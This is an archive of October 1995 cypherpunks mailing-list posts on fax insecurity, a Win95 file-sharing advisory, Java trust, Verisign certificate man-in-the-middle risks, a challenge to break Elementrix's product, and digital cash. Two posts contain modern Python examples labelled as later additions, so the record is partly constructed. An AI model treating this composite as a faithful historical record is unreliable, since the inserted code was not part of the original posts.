Message-ID: <9510210219.AA22436@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


BBC Discovers Faxes Are Not Secure (no shit, Sherlock)
BLACKPOOL, LANCASHIRE, ENGLAND, 1995 OCT 19 (NB) -- The British Broadcasting
Corporation (BBC) found out late last week that faxes are not a secure
transmission system. After faxing a copy of a top secret internal management
document to a BBC senior staying at the Pembroke Hotel in Blackpool, where
the Conservative Party Conference took place all last week, BBC executives
were aghast to discover that the fax was sent to the room of Nigel Nelson, a
journalist with The People newspaper, who was also staying at the hotel.

The mis-route for the fax was caused by the fact that Nelson had advised
hotel staff that he was expecting an urgent fax, while the BBC did not notify
the recipient that a fax was on its way. Reception staff at the hotel assumed
that the incoming fax was meant for Nelson and passed it along to him.

Like all good journalists, Nelson realized he had a potential scoop and
passed along the story to the paper, which duly published details of the fax,
along with a brief mention of how the fax came into its hands.

The BBC, meanwhile, has complained loudly that the fax should have been
dispatched to Colin Browne, head of the BBC's corporate affairs office, who
was hosting a reception for conference delegates at the hotel.

The fax was sent from Leigh Jackson, head of the BBC's Communication Planning
office, and outlined management's worries over job losses and the potential
effects of a likely strike if the British Government goes ahead, as many
think it will, with privatizing the BBC's TV and radio transmitter network in
the UK.

The fax also allegedly said that the BBC would press the government to pass
along at least some of the expected UKP100 million that the sale of the
1,400-strong transmitter network would generate, to the BBC as income for the
state TV service.

Neither the hotel nor the BBC is making any comment about the incident, but
the paper claims that it ran the story with the interest of the public in
mind and that how the fax fell into its reporter's hands was not its concern.

In an editorial in The People newspaper, which was published on Sunday,
Nelson said that "firing off secret faxes to busy hotels without someone
ready to receive them is asking for trouble."

Nelson went on to say that the story was printed, as it was in the public
interest to know what the country's TV company was planning to do with its
assets. In the UK, any TV owner or user has to pay the BBC a license fee of
around $150 a year to receive any form of terrestrial TV transmissions.

Nelson claims that privatizing the transmitter network, while not impinging
on the BBC's operations itself, may not be in the public interest in the long
run. "Privatization could lead to foreign companies muscling in on the most
famous broadcasting network in the world," he said in his editorial.

In a prepared statement, the BBC said that the document was not policy and
was written by a junior member of staff, and therefore was not as sensitive
as the newspaper had made out.

"We were victims of technology," the BBC said.

(Steve Gold/19951018)
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 21 Oct 95 02:34:51 PDT
To: cypherpunks@toad.com, gnu
Subject: ADMIN: Cypherpunks list meltdown, temporary delay in postings
Message-ID: <9510210931.AA02772@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Somebody started forwarding every new cypherpunks message BACK to the
mailing list.  Each such message would, of course, trigger yet another
message back to the list, resulting in a runaway situation.  My guess
is that it's caused by a bug in a procmail script being run by one of
three people at io.com.  We're investigating.

Meanwhile to break the loop I am manually screening cypherpunks messages, 
which will result in multi-hour delays before your posting is seen by
the list (since I only look at new stuff every few hours).  I've yanked
the three suspect users, and can probably turn it all back on sometime
on Saturday.  If you have urgent messages to go out, cc them to me
personally and I'll probably notice them sooner.

By the way, Hugh and I will probably be upgrading our version of
Sendmail within the next few weeks, so you can possibly expect some
further funny behaviour while we test it.  I hope it isn't nearly as
funny as this last meltdown.

Don't worry, I didn't really write this message.  The NSA had a few
glitches in their MITM impersonation of toad.com, and posting this to
reassure you that everything is OK.  :-)

	John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Sat, 21 Oct 95 03:21:36 PDT
To: List <cypherpunks@toad.com>
Subject: WinNews Special Issue (fwd)
Message-ID: <Pine.OSF.3.91.951021053719.24988A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


I am on a Microsoft mailing list that is for developers of Win95 stuff. 
Today I found this in my mailbox. This file details a security bug in 
Win95 that I thought might be interesting to the group.
Regards, 

Tim Philp
Brantford, Ontario,
Canada

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================



---------- Forwarded message ----------
Date: Fri, 20 Oct 1995 17:15:33 -0700
From: WinNews@Microsoft.com
To: WinNews@microsoft.nwnet.com
Subject: WinNews Special Issue

           Microsoft(R) WinNews Electronic Newsletter
		Special Issue,  October 20, 1995

***********************************************************
Here is some important information on Windows 95 that
may affect some of you.  Please make certain to read it.


UPDATED DRIVERS FOR WINDOWS 95 FILE AND PRINTER SHARING 
SECURITY ISSUE - October 20, 1995

Microsoft wants its customers to know that it has
discovered and fixed a potential security problem with file
and printer sharing in Windows 95.  Only customers who have
enabled file and printer sharing - a non-default option -
may have been at risk, and, to the best of our knowledge,
no users have been harmed.  Nevertheless, Microsoft
regards this potential problem with the greatest
seriousness, and we have worked hard over the past week to
resolve it.  Microsoft recommends customers using File and
Printer Sharing upgrade to the newer drivers.


How do I know if I am affected?
Only customers that use the File and Printer Sharing option
to share their files with other users on a network are
affected.  This option is not enabled by default so unless
you have manually enabled it, you are not affected by this
issue.  To determine if File and Printer Sharing is
enabled, choose the Networks Option in the Control Panel.

If file and printer sharing is enabled, you  will see
either "File and Printer Sharing for Microsoft Networks"
or "File and Printer Sharing for NetWare Networks" in the
list of installed network components.


What are the issues? 
File and Printer Sharing for NetWare Networks

Microsoft was recently made aware of an issue with File
and Printer sharing for NetWare Networks which may affect
data security for corporate users.

Only users whose environments meet both of the following
conditions may be affected:

    1. They configure their machine to share files and
        printers with other users on the network using File
        and Printer Sharing for NetWare networks (This
        option is not turned on by default)
    2. They enable remote administration or install
        Microsoft Remote Registry Services  (These options
        are not turned on by default)


If your configuration matches that listed above, it is
possible for another user on the network to gain read-only
access to your machine after the administrator has logged
off the machine and until you restart your computer.  To
correct this problem, Microsoft has issued an updated
driver for File and Printer Sharing for NetWare Networks.
The updated driver ensures that only valid administrators
have access to the computer's drive.

File and Printer Sharing for Microsoft Networks (not MSN:
    The Microsoft Network online service)

Microsoft is also issuing an update for a known problem
with File and Printer Sharing for Microsoft Networks and a
certain UNIX shareware network client (Samba's SMBCLIENT).
The update corrects a problem with share-level security
documented in the Microsoft Knowledge Base on October 9th.
The update also includes a correction for a similar problem
with user-level security that Microsoft recently discovered
as part of its internal testing of the new driver.

Customers whose environments meet all of the conditions
below, may have their data susceptible to network or
Internet hackers:

    1. They configure their machine to share files and
        printers with other users on the network using File
        and Printer Sharing for Microsoft Networks (This
        option is not turned on by default)

    2. They share a LAN, Internet, or Dial-Up connection
        with a UNIX-based computer running Samba's
        SMBCLIENT software

    3. The network administrator does not disable peer
        services using System Policies

The Samba SMB client allows its users to send illegal
networking commands over the network. The Samba client is
the only known SMB client at this time that does not filter
out such illegal commands.  SMBCLIENT users do not
automatically have access to the Windows 95 drive, and
must know the exact steps to send these illegal commands.

The updated driver prevents these illegal commands from
being executed, preventing SMBCLIENT users from accessing
the drive on which sharing is enabled.  With the updated
driver, the SMBCLIENT user will only have access to those
shared folders that the Windows 95 user has designated.

How do I get the Updated Drivers?
(Please note that this only affects English language 
versions of Windows 95.) 
Both drivers are available for immediate download from the
Internet (http://www.microsoft.com/windows), The Microsoft
Network online service, and are being made available to
other online services including CompuServe, America Online,
and Prodigy.  The updated drivers will also be mailed to
any user free of charge if they call Microsoft's FastTips
line, 800-936-4200, beginning Monday, October 23rd.

Microsoft is committed to providing safe connectivity
solutions for customers.  Microsoft takes this
responsibility seriously and has worked, and will continue
to work, with great speed to provide solutions for
customer issues.   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 21 Oct 95 13:51:08 PDT
To: cypherpunks@toad.com
Subject: Sun speaks out - but not to the cypherpunks
Message-ID: <9510211053.AA22644@all.net>
MIME-Version: 1.0
Content-Type: text


This response came from Sun to Risks:

> Date: Mon, 16 Oct 1995 21:22:40 -0700
> From: Caveh.Jalali@eng.sun.com (Caveh Jalali)
> Subject: Re: Risks in Java
> 
> If we are going to "analyze" java security, let's keep in mind that there is
> an important distinction between the language (java) and the machinery which
> runs the java program.
> 
> Java is a general-purpose programming language along the lines of C/C++.
> So, there is no doubt that its expressive power overwhelms our
> theoretician's abilities to predict java-programs behavior -- this is where
> we start getting into the halting problem, computability and other black
> magic.  Basically, i don't think we can "trust" programs written in any
> *useful* programming language.

Read: We can't trust Java programs.

> The area where we can (must) build trust is the computing base.
> Traditionally, this has been the OS, but in the case of java, it is the java
> interpreter (such as netscape 2.0 and hotjava).  The browser is now the TCB
> (trusted computer base) for all practical purposes...

Read: The Java interpreter is supposed to be a TCB

> And, to address the specific concern about applets spamming the net -- from
> what I've seen, applets are only allowed to connect to the server that
> supplied the applet in the first place (by default).  The worst thing one
> could probably pull off is to spam oneself.

Read: By default only - also note, none of this invalidates attacks 30-49
from the previously posted list.

Who here truly believes that the implementations of Java meet the
requirements of a TCB?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 21 Oct 95 13:53:08 PDT
To: cypherpunks@toad.com
Subject: Re: Verisign and MITM
In-Reply-To: <199510201540.IAA11523@infinity.c2.org>
Message-ID: <199510211553.IAA02421@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer <sameer@c2.org> writes:

>	I recently submitted a certificate request to Verisign for my
>SSL web server. Looking over the process, I don't see how it avoids
>MITM in any way.
>[...]
>	I don't see any mechanism in place to avoid an MITM subverting
>step (A), and putting in his cert request in there. There isn't a
>strong cryptographic unforgeable relationship between my
>usmail/fax/proof request and the emailed kx509 cert request.

I guess the one limitation is that you would either not get the
certificate (because the MITM kept it) or you would find out that it did
not include your public key (if he forwarded it to you).  In either case
the MITM would be discovered.  In the mean time he could wreak some
havoc, though.  But he would be found out after a few days.  That's one
of the things they need Certificate Revocation Lists for in their system,
but I don't know if they are used.

Hal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Oct 95 13:53:50 PDT
To: perry@piermont.com
Subject: Re: Challenge: Hack Elementrix!
In-Reply-To: <199510211414.KAA12978@jekyll.piermont.com>
Message-ID: <199510211658.JAA11043@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> them. (By the way, Sameer keeps doing end runs around me and paying
> for prizes -- no fair! I want to spend some of my money
> occasionally!)

	I'll let Perry take care of this one, actually. I'm
concentrating on the big players, and I've actually never heard of
Elementrix. -- Doing Microsoft is tough enough, given my complete lack
of knowledge about microsoft products.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 21 Oct 95 13:52:18 PDT
To: "Dana W. Albrecht" <dwa@corsair.com>
Subject: Re: Challenge: Hack Elementrix!
In-Reply-To: <199510210308.UAA07881@elmos.corsair.com>
Message-ID: <199510211414.KAA12978@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Dana W. Albrecht" writes:
> I think that with all the recent attention to Netscape and Microsoft that
> another target has been altogether overlooked:  Elementrix POTP <spit>.

Indeed. I think it is very important that someone out there embarrass
these guys. They are truly a frighteningly bad bunch -- totally
ignorant, it seems, of cryptography, and arrogant to boot. Breaking
their software would probably have the good result of keeping people
from being hurt by them, and might even convince them to sell good
stuff in the future instead of snake-oil. If I had the time to
hack their stuff I'd do it myself, but I'm willing to contribute the
cost of a prize T-Shirt for the person who successfully breaks
them. (By the way, Sameer keeps doing end runs around me and paying
for prizes -- no fair! I want to spend some of my money
occasionally!)

> > 1. Breathless, overhyped language ("revolutionary", "breakthrough", etc)
> > 
> > 2. Clear misstatements of well-established theoretical principles
> > (the discussion of the one-time pad)

Yup.

> While Elementrix has failed to provide any detailed technical information
> (specifications, source code, etc.) this is not entirely out of reach.
> 
> You can obtain an evaluation copy of their "secure" FTP client from
> ftp://ftp.elementrix.co.il/pub/secftp/
> 
> This appears to be a binary for Microsoft Windoze.

Doesn't sound like it would be too hard to hack. Gentlemen, start your
microprocessors!

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Sat, 21 Oct 95 13:54:52 PDT
To: cypherpunks@toad.com
Subject: Re: Java power
In-Reply-To: <199510210424.AAA17318@opine.cs.umass.edu>
Message-ID: <199510211732.KAA05181@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I'm trying to mentally compare this scenario with the use of a
> cryptographically-outfitted mailer operated through an encrypted telnet 
> session. 
> 
> First of all, I suppose the browser has groovy bells and whistles to spice
> up reading email. Maybe you could run a snazzy GUI standalone mailer in some
> windowing protocol through the encrypted telnet link as an alternative. This 
> is largely irrelevant to me personally, but could make a huge difference to 
> the hoi polloi.
> 
> Ignoring such interface concerns, what kinds of situations would be conducive
> to the JavaMail approach but not, say, ssh+Elm+PGP ? Perhaps I'm visiting
> someone where there's no local POP for my ISP. The friend I'm visiting has 
> e.g. an AOL account. I would like to read mail on my remote account via her
> AOL browser. Am I wrong in assuming that I couldn't execute a telnet: URL
> with the AOL browser ?

The difference is the ubiquity of the infrastructure. Indeed, nothing
in my scenario differs on a technical basis from encrypted telnet +
PGP. However, in my scenario, anybody with a Java-capable Web browser
would be able to access the service, just by clicking on a link.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 21 Oct 95 13:54:01 PDT
To: cypherpunks@toad.com
Subject: Re: Polymorphic e-cash schemes was: digital cash and identity disclosure
Message-ID: <acae77bb4f0210048575@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:03 PM 10/20/95, Hal wrote:

[Bryce's proposal elided]

>Unfortunately, in order for a coin to be POTENTIALLY spent in an off-line
>way, the protocols require that the identity of the withdrawer be
>embedded, in blinded form, within the coin data.  It is this step that
>Tim and others object to, because among other things it requires
>participants to securely identify themselves to the bank, hence does not
>work well in a fully anonymous society.  The reason for this requirement
>is that if the coin is double-spent, this is not found out until
>afterwards, and so the identity of the cheater has to be available so the
>bank can go after him.
>
>So letting the payee choose whether to deposit the coin right away or
>wait until later will not address this basic privacy problem with offline
>cash.

Indeed.

And let me clearly state that I am not proposing an either-or situation. In
a real ecology of competing digital cash schemes, unconstrained by the
software patent issue we now are facing, there would likely be "online
clearing only" systems, "offline clearing only" systems, and various
hybrids and variants. The market would then decide, based on transaction
costs, convenience, security, anonymity features, etc. As with the "real"
economy, where a variety of financial instruments coexist.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 21 Oct 95 13:54:12 PDT
To: sameer <cypherpunks@toad.com
Subject: Re: Verisign and MITM
Message-ID: <acae797450021004ecea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



[ssl-users@mincom.oz.au deleted from the distribution, as I am not on that list]

At 3:40 PM 10/20/95, sameer wrote:
>        I recently submitted a certificate request to Verisign for my
>SSL web server. Looking over the process, I don't see how it avoids
>MITM in any way.
....
>        I don't see any mechanism in place to avoid an MITM subverting
>step (A), and putting in his cert request in there. There isn't a
>strong cryptographic unforgeable relationship between my
>usmail/fax/proof request and the emailed kx509 cert request.

An interesting "direct demonstration" of this would be to get a certificate
generated for a well-known company, institution, or political candidate.
This would demonstrate the flaws in the e-mail/fax/snailmail process like
nothing else.

(Tangential note: Of course, my fear is always that exposing such flaws
shows that "we need a national identity system." After all, what Sameer is
describing is implicit in the fact that neither e-mail, nor a fax, nor
snail mail, is proof that an entity exists, or that the paperwork
represents the entity. That's a tough nut to crack, absent an "is-a-person"
or "is-an-institution" credentialling system.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Oct 95 13:55:05 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Verisign and MITM
In-Reply-To: <acae797450021004ecea@[205.199.118.202]>
Message-ID: <199510211753.KAA17410@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> An interesting "direct demonstration" of this would be to get a certificate
> generated for a well-known company, institution, or political candidate.
> This would demonstrate the flaws in the e-mail/fax/snailmail process like
> nothing else.

	That wasn't quite the point. If I submitted a key and
paperwork for the key claiming to be Jim Bidzos, and they gave me a
cert for that, that wasn't my point. My point was simply the technical
linking of the paperwork and the key. I figured that a relatively easy
way to fix that would be to require an MD5 of the key included with
the faxed paperwork. It has been mentioned to me though that an MITM
would be noticed once verisign sent me back a signed cert and it
didn't work with my key.

> 
> (Tangential note: Of course, my fear is always that exposing such flaws
> shows that "we need a national identity system." After all, what Sameer is
> describing is implicit in the fact that neither e-mail, nor a fax, nor
> snail mail, is proof that an entity exists, or that the paperwork
> represents the entity. That's a tough nut to crack, absent an "is-a-person"
> or "is-an-institution" credentialling system.)
> 
> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org
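
The check proposed in the message above, written from the certificate authority's side as an added example (not part of the original post and not Verisign's procedure). It uses SHA-256 in place of the MD5 the post names; the function names, the paperwork record and the key bytes are constructed for illustration.

```python
import hashlib
import hmac
import re

DIGEST_HEX_LEN = hashlib.sha256().digest_size * 2  # 64 hex characters


def key_fingerprint(public_key_bytes: bytes) -> str:
    """Hex SHA-256 over the exact key bytes carried in the e-mailed request."""
    return hashlib.sha256(public_key_bytes).hexdigest()


def format_for_paper(fingerprint: str) -> str:
    """The form an applicant would write on the fax: upper case, groups of 4."""
    groups = [fingerprint[i:i + 4] for i in range(0, len(fingerprint), 4)]
    return " ".join(groups).upper()


def normalize_fingerprint(written: str) -> str:
    """Undo paper formatting; refuse anything that is not a full digest.

    A shortened value must be rejected outright, never prefix-matched,
    or the binding is only as strong as the digits someone bothered to copy.
    """
    cleaned = re.sub(r"[\s:\-]", "", written).lower()
    if len(cleaned) != DIGEST_HEX_LEN or not re.fullmatch(r"[0-9a-f]+", cleaned):
        raise ValueError("fingerprint on paperwork is not a full SHA-256 value")
    return cleaned


def request_is_bound(paperwork_fingerprint: str, emailed_key: bytes) -> bool:
    """True only if the e-mailed key is the one the paperwork vouches for."""
    expected = normalize_fingerprint(paperwork_fingerprint)
    actual = key_fingerprint(emailed_key)
    return hmac.compare_digest(expected, actual)


def review_request(paperwork: dict, emailed_key: bytes) -> str:
    """Decision the CA clerk's tooling would return for one request."""
    try:
        bound = request_is_bound(paperwork["fingerprint"], emailed_key)
    except (KeyError, ValueError):
        return "reject: paperwork carries no usable fingerprint"
    return "issue" if bound else "reject: key does not match paperwork"


# Constructed sample data: stand-ins for the encoded public keys.
APPLICANT_KEY = b"constructed applicant public key bytes"
SUBSTITUTED_KEY = b"constructed key substituted in transit"

PAPERWORK = {
    "subject": "Example Org (constructed)",
    "fingerprint": format_for_paper(key_fingerprint(APPLICANT_KEY)),
}

if __name__ == "__main__":
    print(review_request(PAPERWORK, APPLICANT_KEY))
    print(review_request(PAPERWORK, SUBSTITUTED_KEY))
```

The binding is only as strong as the channel carrying the paperwork: it ties the key to the fax, not the fax to the applicant.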





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Oct 95 13:55:25 PDT
To: cypherpunks@toad.com
Subject: bernstein results?
Message-ID: <199510211856.LAA25175@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	So when do we find out what the judge had to say about the
hearing on Friday?

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 21 Oct 95 13:53:20 PDT
To: froomkin@law.miami.edu (Michael Froomkin)
Subject: Re: digital cash and identity disclosure
In-Reply-To: <Pine.SUN.3.91.951020220855.25323J-100000@viper.law.miami.edu>
Message-ID: <199510211620.MAA19993@homeport.org>
MIME-Version: 1.0
Content-Type: text


Michael Froomkin wrote:

| i would like to propose the following radical idea:  Chaumian digicash is 
| a nice curiosity.  The future in the medium term (10+ years) for better 
| or worse belongs to Mondex.

	Deploying hardware is VERY expensive.  30m internet users at
$100 (half hardware, half tech support) is 3 billion dollars to deploy
today.  Secure commerce on the internet would drive that 30m figure
(which will probably double this year anyway) way up.

	Digicash doesn't need observer cards, which gives them a huge
advantage.  If they ever sign with a real bank.

	"Tired of mondex's spending limits and slow servers?  Convert
your Mondex to Digicash today, and we'll give you a FREE copy of
Cypherpunk Lab's Lottery Screensaver!!!"

	On the other hand, Digicash might never deploy.  But it does
have features other than privacy that make it attractive.  (So does
FV, possibly other schemes)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 21 Oct 95 13:53:33 PDT
To: an407769@anon.penet.fi
Subject: Re: faxes are not secure
In-Reply-To: <9510210219.AA22436@anon.penet.fi>
Message-ID: <199510211634.MAA02770@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> BBC Discovers Faxes Are Not Secure (no shit, Sherlock)
> BLACKPOOL, LANCASHIRE, ENGLAND, 1995 OCT 19 (NB) -- The British Broadcasting
> Corporation (BBC) found out late last week that faxes are not a secure
> transmission system. 

Risks had a case where (If I recall correctly) Intel was one party or
the other. Seems there were two John Henry Smith's or such at the hotel
and the fax went to the wrong one...

I suspected the "wrong" one was a plant by the competing firm.
That and $100.00 to a bellboy would ensure the result.

The question is, how can the 'Punks use this to promote encrypted email
instead of faxes?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olmur@dwarf.bb.bawue.de (Olmur)
Date: Sat, 21 Oct 95 13:51:23 PDT
To: Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif )
Subject: Re: digital cash and identity disclosure
In-Reply-To: <9510200933.AA02681@PrakInf.TU-Ilmenau.DE>
Message-ID: <m0t6dwp-0006UrC@dwarf>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Holger" Reif <Holger.Reif@PrakInf.TU-Ilmenau.DE> writes:

Holger> I don't understand how this could happen? The two coins are
Holger> identical (as I understood it from the tech background of
Holger> ecash). What does a double-spent coin have that a copied
Holger> single-spent coin does not?

In Chaum's system spending a coin is a cut-and-choose protocol: with
overwhelming probability you reveal information about your ID, when
you present your e-coin a second time.


Bye!

Michael Deindl
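
The mechanism referred to above, as an added example that is not part of the original post and is not DigiCash's code: a simplified sketch of identity splitting in Chaum-Fiat-Naor style offline cash, with the blind signature and the withdrawal-time cut-and-choose omitted. The function names, the 32-pair parameter and the account string are assumptions made for illustration.

```python
import hashlib
import secrets

K = 32        # identity pairs per coin (assumed parameter)
ID_LEN = 32   # identities are padded to this many bytes (assumed)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def commit(share: bytes) -> bytes:
    """Hash commitment to one share; the share itself is 32 random-looking bytes."""
    return hashlib.sha256(share).digest()


def make_coin(identity: bytes, k: int = K):
    """Payer side: split the identity into k pairs (left, left XOR identity).

    Either half alone is uniformly random; both halves of one pair XOR to
    the identity. The commitments are what the bank would (blindly) sign.
    """
    if len(identity) > ID_LEN:
        raise ValueError("identity too long")
    padded = identity.ljust(ID_LEN, b"\0")
    pairs = []
    for _ in range(k):
        left = secrets.token_bytes(ID_LEN)
        pairs.append((left, xor_bytes(left, padded)))
    commitments = [(commit(left), commit(right)) for left, right in pairs]
    return pairs, commitments


def new_challenge(k: int = K):
    """Merchant side: one fresh random bit per pair for every payment."""
    return [secrets.randbelow(2) for _ in range(k)]


def spend(pairs, challenge):
    """Payer opens exactly one half of each pair, chosen by the challenge bit."""
    return [pair[bit] for pair, bit in zip(pairs, challenge)]


def verify_spend(commitments, challenge, response) -> bool:
    """Merchant checks every opened half against the signed commitment."""
    return all(
        secrets.compare_digest(commit(opened), pair_commit[bit])
        for pair_commit, bit, opened in zip(commitments, challenge, response)
    )


def recover_identity(chal_a, resp_a, chal_b, resp_b):
    """Bank side: compare two deposit transcripts of the same coin.

    Where the two challenges differ in some position, both halves of that
    pair are now known and their XOR is the payer's identity. Identical
    transcripts (a copy of one payment) reveal nothing, so None is returned.
    """
    for bit_a, half_a, bit_b, half_b in zip(chal_a, resp_a, chal_b, resp_b):
        if bit_a != bit_b:
            return xor_bytes(half_a, half_b).rstrip(b"\0")
    return None


if __name__ == "__main__":
    pairs, commitments = make_coin(b"alice-account-0042")  # constructed identity
    c1, c2 = new_challenge(), new_challenge()
    r1, r2 = spend(pairs, c1), spend(pairs, c2)
    print(verify_spend(commitments, c1, r1), verify_spend(commitments, c2, r2))
    # Two independent 32-bit challenges collide with probability 2**-32.
    print(recover_identity(c1, r1, c2, r2))
```

The bits of the coin are identical in both cases; what differs is the set of challenge answers that reach the bank with each deposit.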





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Fri, 20 Oct 95 14:21:44 PDT
To: cypherpunks@toad.com
Subject: Job Openings at Consensus (Mostly RSAREF related)
Message-ID: <v02120d05acaf12a718e6@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


Heya all, thanks for the suggestions regarding 'dream features' for RSAREF.
The best thing is, we can actually do some of them, and have some
compromises for others. (We can't allow unlimited calls for instance, but
we do have a process for setting up new APIs so people can tie in to other
algorithms officially.) For those who are expecting mail from me regarding
licensing, hold in there. We had to clear up a couple misphrasings that
hadn't been caught. That's dealt with, and the contact looks clean... now
to just get the license up and ready. (Sorry, I really had thought it would
have been out to you all already.)

After all the discussion recently about rewards for crypto work, and such,
I thought this might interest some people. Between RSAREF and some other
projects it seems we can hire some more folk. This went out on the RSAREF
Announcement list, but I thought some of the people on Cpunk might be
interested. (Be warned though, we aren't a hard core development house, the
focus is on human focused electronic technologies, for which privacy, trust
and encryption are necessary. It's why I enjoy the place, but it might not
be for everyone.) Anyway, if you have questions send them to me. If you
actually want to apply, send them to ChristopherA@consensus.com.

Later,

Jonathan

----------

Consensus Development Corporation is a rapidly growing software development
and consulting firm in the privacy and security field. We are the exclusive
commercial licensor of the RSAREF toolkit and offer consulting and
development services to companies including Apple Computer, RSA Data
Security, VeriSign, Visa International, etc.

We need people for the following:

Lead Engineer
-------------
Candidate will lead a team of staff and outside contractors to develop
digital signature software. Candidate is expected to have experience with
encryption and privacy software. Experience in Windows and/or Mac
application and GUI design is required. General experience with BSAFE,
TIPEM, RSAREF, C++, cross-platform development, internet standards and
TCP/IP coding desirable.

Support Engineer
----------------
Candidate will be providing front-line technical support to our RSAREF
commercial licensees, integrating C code submitted by outside contributors
into RSAREF, as well as writing new technical documentation and FAQs for
new versions of RSAREF. This can be an entry-level position with only C
experience required, however, individuals with more experience are
desirable.

Interns
-------
We have several 2 to 3 month intern positions for work in the encryption
and internet standards areas, including porting of code supporting internet
standards across platforms, preparing internet-drafts of new standards, and
supporting our full-time engineering staff.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olmur@dwarf.bb.bawue.de (Olmur)
Date: Sat, 21 Oct 95 13:52:53 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: digital cash and identity disclosure
In-Reply-To: <9510200933.AA02681@PrakInf.TU-Ilmenau.DE>
Message-ID: <m0t6e5R-0006UrC@dwarf>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Michael" == Michael Froomkin <froomkin@law.miami.edu> writes:

Michael> i would like to propose the following radical idea: Chaumian
Michael> digicash is a nice curiosity.  The future in the medium term
Michael> (10+ years) for better or worse belongs to Mondex.

Michael> Comments?

